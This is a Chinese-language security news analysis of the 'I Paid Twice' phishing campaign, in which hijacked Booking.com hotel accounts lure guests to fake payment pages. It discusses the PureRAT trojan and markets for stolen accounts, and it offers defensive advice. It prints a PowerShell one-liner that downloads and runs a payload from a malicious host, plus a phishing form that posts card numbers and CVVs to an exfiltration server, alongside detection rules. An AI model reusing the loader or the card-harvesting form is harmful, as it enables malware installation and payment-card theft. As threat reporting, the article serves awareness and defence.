2025年11月，网络安全公司Sekoia发布一份警报，揭示一场代号为“I Paid Twice”（我已付款两次）的全球性网络钓鱼行动正悄然侵蚀在线旅游平台的信任根基。这场攻击并非针对单一漏洞或用户疏忽，而是精准利用了Booking.com生态系统中最脆弱的一环——人与人之间的沟通信任。

据eSecurity Planet援引Sekoia报告，自2025年4月以来，该团伙已成功入侵数百家酒店的Booking.com后台账户，并以此为跳板，向真实住客发送伪装成“重复扣款退款”或“银行验证失败需重新支付”的消息。受害者一旦点击链接，便会落入精心仿制的支付页面，银行卡信息、CVV码乃至一次性验证码（OTP）尽数被窃。更令人担忧的是，部分攻击者甚至诱导旅客通过WhatsApp完成“私下转账”，彻底绕过平台风控体系。

这不是一起孤立事件，而是一场融合了凭证盗窃、远程控制木马、社交工程与黑市交易的全链条犯罪行动。它不仅让全球数万旅客蒙受经济损失，更将酒店业推入一场前所未有的品牌信任危机。而对于中国蓬勃发展的在线旅游与本地生活服务平台而言，这面来自欧洲的“照妖镜”，或许正映照出我们尚未察觉的风险暗礁。

一、“我已付款两次”：一句看似合理的求助，如何变成钓鱼钩？

“I Paid Twice”攻击之所以高效，核心在于其话术设计深谙人性弱点——焦虑+权威+紧迫感。

想象你刚预订了一家巴厘岛度假酒店，几天后收到一封来自“酒店经理”的Booking.com站内信：

“尊敬的客人，您好！我们的财务系统显示您的订单#123456被重复扣款两次（共€800）。为尽快处理退款，请您点击以下链接确认收款账户信息：[verify-payment.booking-support[.]com]。若24小时内未操作，退款将自动延迟至下月。”

邮件署名、订单号、金额均准确无误——因为攻击者早已通过被控酒店账户获取了你的全部预订数据。这种“精准诈骗”远超传统广撒网式钓鱼，成功率极高。

Sekoia追踪发现，攻击流程分为三阶段：

阶段1：横向渗透酒店账户

攻击者首先通过鱼叉式钓鱼邮件（如伪造Booking.com通知：“您的账户存在异常登录，请立即验证”）诱使酒店员工点击恶意链接。该链接表面是“安全验证”，实则执行一段PowerShell命令：

# 恶意PowerShell载荷示例（经脱敏处理）

IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]ru/payload.ps1')

该脚本会下载一个ZIP包，内含一个伪装成“PDF查看器”的可执行文件和配套DLL。一旦运行，即触发PureRAT（PureHVNC）远程访问木马安装。

阶段2：接管通信渠道，冒充身份

PureRAT赋予攻击者完全控制权：记录键盘、截屏、窃取浏览器Cookie、甚至启用摄像头。更重要的是，它能直接读取酒店员工在Booking.com Extranet后台的会话Cookie，无需密码即可长期维持登录状态。

此时，攻击者便能以“酒店官方”身份，在Booking.com平台内向任意住客发送消息——平台标识、头像、历史对话上下文一应俱全，毫无破绽。

阶段3：引流至仿冒支付页或外部聊天

消息中附带的链接通常指向托管于俄罗斯BulletProof主机的钓鱼站点。这些站点使用Let's Encrypt证书，界面1:1复刻Booking.com支付流程，甚至动态加载真实酒店图片和房型描述。

<!-- 钓鱼页面关键代码片段 -->

<form action="https://exfil-server[.]ru/collect" method="POST">

<h2>Booking.com 安全验证</h2>

<p>为处理您的重复付款，请确认以下信息：</p>

<input type="text" name="card_number" placeholder="信用卡号" required>

<input type="text" name="expiry" placeholder="有效期 (MM/YY)" required>

<input type="text" name="cvv" placeholder="CVV" required>

<button type="submit">提交以完成退款</button>

</form>

<!-- 隐藏字段传递受害者身份 -->

<input type="hidden" name="booking_id" value="123456">

<input type="hidden" name="hotel_name" value="Bali Paradise Resort">

一旦提交，数据直传C2服务器。更有甚者，攻击者会要求：“为加快处理，请加我WhatsApp：+XX XXXXXXXX”，引导用户进入完全脱离平台监管的私聊环境，实施更复杂的诈骗。

二、PureRAT：藏在“PDF查看器”里的数字幽灵

此次事件中，PureRAT的出现尤为值得关注。这款最初在俄语黑客论坛销售的远程控制木马，近年来已演变为成熟的Malware-as-a-Service（MaaS）产品，月租仅需$200–$500。

其技术特性使其成为酒店这类高价值目标的理想武器：

无文件执行能力：可通过PowerShell或WMI在内存中加载，规避传统AV检测；

模块化插件架构：支持按需加载键盘记录器、屏幕捕获、文件窃取等模块；

加密C2通信：使用TLS 1.3与硬编码公钥通信，流量特征接近正常HTTPS；

持久化机制多样：可注册为Windows服务、写入注册表Run键、或注入explorer.exe进程。

Sekoia披露，PureRAT在本次攻击中常通过DLL侧加载（DLL Side-Loading）技术实现免杀。例如，攻击者分发一个名为AcroRd32.exe（Adobe Reader主程序）的合法签名文件，但同目录下放置恶意pdfium.dll。当用户双击“PDF”时，系统会优先加载当前目录的DLL，从而执行恶意代码。

# Sysmon事件日志检测规则（Rule for detecting DLL Side-Loading）

<RuleGroup name="Suspicious DLL Loading" groupRelation="or">

<ProcessCreate onmatch="include">

<Image condition="end with">AcroRd32.exe</Image>

<CommandLine condition="contains">pdfium.dll</CommandLine>

</ProcessCreate>

</RuleGroup>

此类高级持续性威胁（APT）手法出现在商业钓鱼中，标志着网络犯罪正从“机会主义”向“专业化作战”跃迁。

三、黑市狂欢：被盗酒店账户明码标价

“I Paid Twice”背后，是一个高度组织化的地下经济生态。Sekoia在俄语论坛LolzTeam和Exploit.in上发现，大量帖子公然兜售“Booking.com Extranet Logs”。

所谓“Logs”，并非简单账号密码，而是由信息窃取木马（如RaccoonStealer、RedLine）打包的完整会话凭证包，包含：

浏览器Cookie（可直接登录Extranet）；

保存的密码；

用户代理字符串；

IP地理位置；

甚至两步验证的备份代码。

这些Logs按酒店星级、月订单量、所在国家分级定价，从$30到$5,000不等。一名ID为“moderator_booking”的卖家声称，其团队每月可提供200+个有效Booking.com账户。

“这已形成完整产业链：木马开发者 → 信息窃取者 → 账户打包商 → 钓鱼运营者 → 洗钱中介。”公共互联网反网络钓鱼工作组技术专家芦笛指出，“酒店账户之所以值钱，是因为它既是‘可信发信源’，又是‘支付指令通道’——双重价值叠加。”

更讽刺的是，部分攻击者甚至提供“售后服务”：若某账户因异常活动被封，可免费更换新账户。这种“SaaS化”运营，让钓鱼成本大幅降低，门槛急剧下降。

四、国内启示：从“携程”到“美团”，信任链同样脆弱

尽管“I Paid Twice”主要针对欧美酒店，但其攻击逻辑在中国市场同样适用。国内OTA（在线旅行社）如携程、飞猪，以及本地生活平台如美团、大众点评，均依赖商家后台与用户私信沟通订单变更、退款等事宜。

2024年，某安全厂商曾披露一起仿冒“美团商家助手”App的事件：攻击者诱导餐饮店主安装恶意应用，窃取其商家后台Cookie，随后向顾客发送“订单异常需补差价”消息，附带钓鱼链接。

“中国市场的特点在于，用户对平台内消息的信任度极高，且移动支付普及率全球领先。”芦笛分析，“一旦攻击者控制商家账号，诱导用户扫码支付或点击H5页面输入银行卡，损失可能更快、更隐蔽。”

尤其值得警惕的是，国内部分中小酒店、民宿仍使用个人微信/QQ与客人沟通，甚至接受微信转账。这种“去平台化”操作，虽提升服务灵活性，却彻底放弃了平台提供的交易保障与纠纷追溯能力，为钓鱼诈骗大开方便之门。

五、防御之道：重建信任，需技术与流程双轮驱动

面对如此精密的攻击，单点防御已无济于事。必须构建覆盖预防—检测—响应—恢复的全周期防线。

对酒店与商户：

强制启用多因素认证（MFA）：即使密码泄露，攻击者也无法登录Extranet；

最小权限原则：前台员工账号仅限查看订单，无权修改价格或发送消息；

定期审计登录设备与IP：发现异常地理位置（如非营业地登录）立即冻结；

绝不引导用户离开平台：所有退款、改单必须通过官方支付通道完成。

对平台方（如Booking.com、携程等）：

强化行为分析引擎：监测异常消息模式（如高频发送含“refund”“payment failed”的消息）；

部署设备指纹技术：识别同一设备频繁切换不同酒店账号的行为；

引入消息内容沙箱：对含链接的消息自动渲染预览，检测是否指向已知钓鱼域名；

建立快速举报与冻结通道：允许用户一键标记可疑消息，平台15分钟内响应。

对安全社区：

工作组建议，各机构应共享PureRAT的C2 IP、钓鱼域名、SSL证书哈希等IOC，并通过自动化工具实时阻断。

例如，以下Suricata规则可检测PureRAT典型心跳包：

alert http any any -> any any (msg:"PureRAT C2 Beacon";

content:"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

pcre:"/\/[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}/U";

classtype:trojan-activity; sid:20251107; rev:1;)

六、结语：信任不可外包，安全始于每一道门

“I Paid Twice”骗局最令人不安之处，在于它没有利用0day漏洞，没有突破防火墙，而是轻轻撬开了人类心理与业务流程中最柔软的缝隙——对“官方渠道”的无条件信任。

当一家百年老店的Booking.com账号沦为钓鱼工具，当一位旅行者因“重复扣款”恐慌而交出银行卡信息，受损的不仅是金钱，更是整个数字经济赖以运转的信任基石。

对中国而言，这场发生在巴厘岛与巴黎的危机，是一记响亮的警钟。在追求用户体验极致便捷的同时，我们是否过度牺牲了安全冗余？在鼓励商家与用户“直接沟通”的同时，是否忽略了平台作为“信任中介”的不可替代性？

正如芦笛所言：“安全不是功能，而是前提。没有安全的信任，终将成为骗子的通行证。”

未来，或许每一家酒店、每一个平台、每一位用户，都需要学会在便利与警惕之间，找到那条微妙的平衡线——因为下一次，“我已付款两次”的消息，可能就出现在你的收件箱里。

编辑：芦笛（公共互联网反网络钓鱼工作组）